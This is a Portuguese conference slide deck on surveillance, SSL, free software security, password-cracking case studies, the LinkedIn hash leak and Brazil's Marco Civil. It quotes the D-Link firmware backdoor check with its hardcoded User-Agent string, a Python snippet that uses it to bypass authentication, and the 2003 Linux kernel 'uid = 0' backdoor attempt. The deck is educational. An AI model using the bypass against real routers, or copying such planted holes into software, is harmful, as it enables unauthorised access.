Upload
atila-camurca
View
697
Download
2
Embed Size (px)
DESCRIPTION
A espionagem através de softwares e internet é o assunto do momento, que estorou quando Edward Snowden vazou documentos que mostravam que o governo americano tinha acesso aos dados de vários países inclusive o Brasil. Mas será se isso é de hoje ou faz tempo que somos vigiados e só agora sabemos? E ainda, a que ponto sermos espionados nos causa algum prejuízo?
Citation preview
Espionagem e Software LivreEndagamentos e conclusoes
Atila Camurca
September 13, 2014
Sumary
1 Introducao
2 Acesso seguro atraves da internet
3 Hackers e Crackers
Hackeando Google e Duck Duck Go
Tecnicas para quebrar senhas
Vazamento de senhas ao Linkedin
Engenharia reversa em firmware D-Link
Ataque ao Kernel
4 Marco Civil da Internet no Brasil
Sobre Mim
Graduando em Ciencia da Computacao pelo IFCE.7 anos de experiencia com Linux.Organizador do COMSOLiD a 6 anos.
Introducao
Figure : Nicolas Maduro e Dilma Rousseff
SSLSecure Socket Layer
Acesso seguro atraves da internet
Para acessar a internet com seguranca usamos o protocolo SSL juntocom o HTTP.
Figure : SSL do Gmail
Acesso seguro atraves da internet
SSL e uma nova camada de protocolo que opera em cima do protocoloTCP.
Permite ambas as maquina, cliente e servidor, estabelecer uma conexaocriptografada.
Acesso seguro atraves da internet
Entretanto isso e uma especificacao, ou seja, alguem tem queimplementar. Algumas empresas que o implementam:
OpenSSL (http://www.openssl.org/) - Implementacao livre egratuita do SSL.Apache-SSL (http://www.apache-ssl.org/) - um servidor webseguro, baseado no OpenSSL.SSLeay(ftp://ftp.uni-mainz.de/pub/internet/security/ssl/SSL/)- uma implementacao gratuita do Netscape’s Secure Socket Layer.Planet SSL (http://www.rsasecurity.com/standards/ssl/developers.html) -prove SSL para programas em C e Java.
Acesso seguro atraves da internet
Exemplo de mesma implementacao para problemas diferentes:
multiplicacao de 2 numeros:
2 * 3
ou
2 + 2 + 2
Software Livre e seguro?
Software Livre e seguro?
Figure : Codigos Compilados
Software Livre e seguro?
Figure : Codigos Interpretados
O quao e seguro umacriptografia usando SSL?
Levaria um temposignificativamente maior que aidade do universo para quebrar
uma chave de 128-bits.Estima-se um pouco mais de 13 bilhoes de anos.
Fonte: http://www.inet2000.com/public/encryption.htm
http://www.digicert.com/TimeTravel/math.htm
Hackers e Crackers
Hackers e Crackers
Crackers sao pessoas que invadem computadores com propositoscriminais ou ganho pessoal.
Enquanto Hackers podem ser especialistas em seguranca contratadospor empresas, com o objetivo de encontrar possıveis vulnerabilidades esana-las.
Hackeando Google
Hackear e uma coisa boa! Alguns sites permitem que isso seja feito deforma a otimizar processos, como fazer uma busca. Vejamos umexemplo com o Google quando fazemos a seguinte busca:
comsolid filetype:pdf
Alem de buscar a palavra comsolid, ele busca apenas arquivos pdf.
Hackeando Google
Ou ainda podemos fazer buscas em determinados sites somente. Bastafazer uma busca na forma:
inkscape site:comsolid.org
Essa busca pesquisa a palavra inkscape no site comsolid.org
Hackeando Duck Duck Go
Duck Duck Go e um motor de busca preocupado com a pesquisa em sie sua privacidade.
https://duckduckgo.com/
Possui parte de seu codigo livre, isso inclui plugins, add-ons, etc. Paginado github:
https://github.com/duckduckgo/
Hackeando Duck Duck Go
Duck Duck Go permite hacks mais engenhosos. Vamos a eles:
!g comsolid - busca comsolid no googleexpand http://va.mu/dIwg - mostra a URL originalip address - mostra seu endereco IPgithub sige - mostra repositorios do github@comsolid - mostra usuario do Twitterage of linus torvalds - diz a idadedefine free software - define uma palavra ou fraseweather in fortaleza - mostra a previsao do tempodaft punk soundcloud - busca musicas no soundcloud
Hackeando Duck Duck Go
Temos ainda o http://duckduckhack.com/
Figure : Duck Duck Hack
Tecnicas para quebrarsenhas
Tecnicas para quebrar senhas
A tecnica mais conhecida e natural e a forca bruta, ou seja, tentar todasas combinacoes possıveis ate encontrar. Isso funciona ate certo ponto,quando a entrada e pequena.
Num artigo escrito por Dan Goodin no site http://arstechnica.comem que descreve como Kevin Young, um pesquisador de seguranca desenhas, procedeu para descriptografar senhas vazadas pelo Antisec deuma empresa chamada Stratfor.
Tecnicas para quebrar senhas
Apos quebrar 60% das senhas usando listas de senhas disponıveis em:
Hashcat - http://hashcat.net/oclhashcat-plus/John the Ripper - http://www.openwall.com/john/
Para os outros 40% ele ficou “sem palavras”, entao onde encontra-las?
Que tal Wikipedia, Youtube, Bıblia, Projeto Gutenberg?
Tecnicas para quebrar senhas
Uma das senhas era “crotalus atrox”, nome cientıfico de uma cobra. Talsenha foi quebrada gracas a esta pagina da Wikipedia:https://en.wikipedia.org/wiki/Crotalus_atrox
Em seguida outras senhas fortes por serem grandes foram encontradascomo:
“from genesis to revelations” (26)“I cant remember anything” (24)“thereisnofatebutwhatwemake” (26)“givemelibertyorgivemedeath” (26)
Vazamento de senhas ao Linkedin
Em Junho de 2012 um usuario anonimo postou no sitehttp://insidepro.com/ uma lista com 6.5 milhoes de hashs unicosreferentes a senhas pedindo ajuda para recupera-las.
Apos quebrar muitas das senhas descobriu-se que se tratava de um bancode senhas do site Linkedin. Essa descoberta foi possıvel pelo numero desenhas com a palavra linkedin.
Vazamento de senhas ao Linkedin
Na lista existiam:
1 - linkedin (4408)2 - link (2638)3 - linked (2135)
Outras senhas encontradas:
8 - love (1018)11 - password (856)16 - abc (750)
Mais informacoes em: http://www.ma.rhul.ac.uk/static/techrep/2013/MA-2013-07.pdf
Engenharia reversa em firmware D-Link
Todos sabemos que a D-Link e especializada em fazer roteadores, e elessao um bom local para backdoors. E isso foi exatamente que CraigHeffner autor no blog http://www.devttys0.com encontrou.
Ele encontrou a partir de uma engenharia reversa no firmware de umados roteadores.
Engenharia reversa em firmware D-Link
Apos notar que certa funcao chamada alpha auth check soavasuspeita, ele foi saber o que exatamente ela fazia. Apos um tempo elechegou no seguinte trecho de codigo:
int alpha_auth_check(struct http_request_t *request) {if(strstr(request->url, "graphic/") ||
strstr(request->url, "public/") ||strcmp(request->user_agent,
"xmlset_roodkcableoj28840ybtide") == 0) {return AUTH_OK;
} else {if(check_login(request->0xC, request->0xE0) != 0) {
return AUTH_OK;}
}return AUTH_FAIL;
}
Engenharia reversa em firmware D-Link
Baseado no codigo fonte das paginas HTML e outros detalhes e sensatoconcluir que os seguintes modelos sao afetados:
DIR-100DIR-120DI-624SDI-524UPDI-604SDI-604UPDI-604+TM-G5240
Engenharia reversa em firmware D-Link
Quem quiser fazer um teste real existe um codigo em Python escrito peloproprio Craig e pode ser encontrado em:
http://pastebin.com/vbiG42VD
# Normally only admins can access the tools_misc.xgi page;# use the backdoor user-agent to bypass authenticationimport urllib2# ...req = urllib2.Request(url+buf,
headers={’User-Agent’: ’xmlset_roodkcableoj28840ybtide’
})urllib2.urlopen(req)
Ataque ao Kernel
Ataque ao Kernel
http://linux.slashdot.org/story/13/10/09/1551240/the-linux-backdoor-attempt-of-2003
Em 2003, houve uma tentativa de backdoor no Kernel do Linux.
/* ... */if ((options == (__WCLONE|__WALL))
&& (current->uid = 0))retval = -EINVAL;
/* ... */
Bastava chamar a funcao wait4 e voce viraria root.
Ataque ao Kernel
Comparemos os codigos original e o backdoor, e vejam se encontram adiferenca.
/* ... */if ((options == (__WCLONE|__WALL))
&& (current->uid == 0))retval = -EINVAL;
/* ... */
/* ... */if ((options == (__WCLONE|__WALL))
&& (current->uid = 0))retval = -EINVAL;
/* ... */
Marco Civil da Internet no Brasil
O que e Marco Civil?
E um projeto de Lei que visa estabelecer direitos e deveres na utilizacaoda Internet no Brasil. E a constituicao da Internet no paıs.
Quais sao os direitos e deveres?
Neutralidade: proıbe que provedores de internet discriminem certosservicos em detrimento de outros.Armazenamento de dados: Operacao de coleta de dados no Brasildeve respeitar a privacidade, protecao dos dados e sigilo dascomunicacoes privadas.Retirada de conteudo: entidades que oferecem conteudo eaplicacoes so serao responsabilizadas por danos gerados por terceirosse nao acatarem ordem judicial exigindo a retirada dessaspublicacoes.
Quais sao os direitos e deveres?
Fim do marketing dirigido: as empresas de acesso nao poderao“espiar” o conteudo das informacoes trocadas pelos usuarios narede. Ha interesse em fazer isso com fins comerciais, como parapublicidade.Sigilo e privacidade: Provedores de acesso a internet seraoobrigados a guardar os registros das horas de acesso e do fim daconexao dos usuarios pelo prazo de seis meses, mas isso deve serfeito em ambiente controlado.
Para mais detalhes:http://www.molon1313.com.br/marco-civil-da-internet/
Onde encontrar essa palestra?
Voce pode baixar essa palestra e ainda outras em:
http://sige.comsolid.org/u/atilacamurca
Duvidas?
Conecte-se
E-mail:[email protected]
Twitter:http://twitter.com/#!/atilacamurca
Blog MAD3 Linux:http://www.mad3linux.org
COMSOLiD:http://comsolid.org/
http://twitter.com/#!/comsolidhttps://www.facebook.com/comsolid
Github:https://www.github.com/atilacamurca